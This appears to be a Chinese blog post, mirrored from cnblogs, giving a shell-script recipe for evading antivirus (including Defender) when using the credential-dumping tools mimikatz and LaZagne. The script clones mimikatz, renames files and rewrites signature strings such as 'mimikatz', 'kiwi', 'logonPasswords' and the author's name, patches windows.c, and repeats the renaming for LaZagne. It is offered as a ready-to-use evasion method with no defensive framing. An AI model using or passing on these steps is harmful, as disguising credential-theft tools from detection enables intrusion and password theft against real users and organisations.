zoukankan      html  css  js  c++  java
  • 关于mimikatz lazagne免杀方法

    其实现在的杀软还是玩的老一套,改改特征字符就能过了,最新的defender能用这个方法过

    文章直接从笔记复制出来的,有需要的自己看情况用

    git clone https://github.com/gentilkiwi/mimikatz.git lmmg
    mv lmmg/mimikatz lmmg/lmmg
    find lmmg/ -type f -name '*mimikatz*' | while read FILE ; do
            newfile="$(echo ${FILE} |sed -e 's/mimikatz/windows/g')";
            mv "${FILE}" "${newfile}";
    done
    find lmmg/ -type f -name '*kiwi*' | while read FILE ; do
            newfile="$(echo ${FILE} |sed -e 's/kiwi/onedrive/g')";
            mv "${FILE}" "${newfile}";
    done
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/Mimikatz/Windows/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/DELPY/gweep/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/Benjamin/gweeperx/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/benjamin@gentilkiwi.com/@gweeperx/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/creativecommons/notcommons/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/gentilkiwi/MSOffice/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/KIWI/ONEDRIVE/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/Kiwi/Onedrive/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/kiwi/onedrive/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/DumpCreds/DumpCred/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/logonPasswords/logonPassword/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/ArgumentPtr/NotTodayPal/g'
    find lmmg/ -type f -print0 | xargs -0 sed -i 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' 
    
    cd ./lmmg/lmmg/
    sed -i "0,/#if !defined(_POWERKATZ)/! {0,/#if !defined(_POWERKATZ)/ s/#if !defined(_POWERKATZ)//*
    #if !defined(_POWERKATZ)/}" windows.c
    sed -i "0,/#endif/! {0,/#endif/! {0,/#endif/ s/#endif/#endif
    *//}}" windows.c
    
    lazagne
    find ./Windows/ -type f -name '*lazagne*' | while read FILE ; do
            newfile="$(echo ${FILE} |sed -e 's/lazagne/kmm/g')";
            mv "${FILE}" "${newfile}";
    done
    
    find ./Windows/ -type d -name '*lazagne*' | while read FILE ; do
            newfile="$(echo ${FILE} |sed -e 's/lazagne/kmm/g')";
            mv "${FILE}" "${newfile}";
    done
    
    find ./Windows/ -type f -name '*LaZagne*' | while read FILE ; do
            newfile="$(echo ${FILE} |sed -e 's/LaZagne/Kmm/g')";
            mv "${FILE}" "${newfile}";
    done
    
    find ./Windows/ -type d -name '*LaZagne*' | while read FILE ; do
            newfile="$(echo ${FILE} |sed -e 's/LaZagne/Kmm/g')";
            mv "${FILE}" "${newfile}";
    done
    find ./Windows/ -type f -name '*laZagne*' | while read FILE ; do
            newfile="$(echo ${FILE} |sed -e 's/laZagne/KMm/g')";
            mv "${FILE}" "${newfile}";
    done
    
    find ./Windows/ -type d -name '*laZagne*' | while read FILE ; do
            newfile="$(echo ${FILE} |sed -e 's/laZagne/KMm/g')";
            mv "${FILE}" "${newfile}";
    done
    
    find windows/ -type f -print0 | xargs -0 sed -i 's/lazagne/kmm/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/LaZagne/Kmm/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/laZagne/KMm/g'
    
    find windows/ -type f -print0 | xargs -0 sed -i 's/BANG/bg/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/passwords ---------------/vp/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/Password not found/nop/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/=================================================================/ll/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/########## User/lp/g'
    find windows/ -type f -print0 | xargs -0 sed -i 's/For more information launch it again with the -v option/jj/g'
  • 相关阅读:
    20170226-云计算设计模式翻译-自动伸缩指南(逐字翻译)
    20170723-Ioc与AOP
    20170710-几维晨规
    诸城项目-开发日志
    GPS常识-B版(简)
    GPS常识-A版(详)
    20141209-基本概念-BlogEngine.NET(1)-笔记
    9.聚类分析
    7.分类:基本概念 忌讳
    6.挖掘关联规则
  • 原文地址:https://www.cnblogs.com/junmoxiao/p/11774748.html
Copyright © 2011-2022 走看看